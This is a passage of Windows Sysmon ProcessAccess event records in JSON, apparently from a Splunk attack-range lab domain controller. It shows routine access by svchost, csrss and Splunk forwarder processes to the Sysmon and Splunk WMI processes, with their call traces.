C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CC-5F25-0000-001055120400}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CC-5F25-0000-001055120400}","TargetProcessId":"3756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CC-5F25-0000-001055120400}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:52.453","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CC-5F25-0000-001055120400}","TargetProcessId":"3756","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:52.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 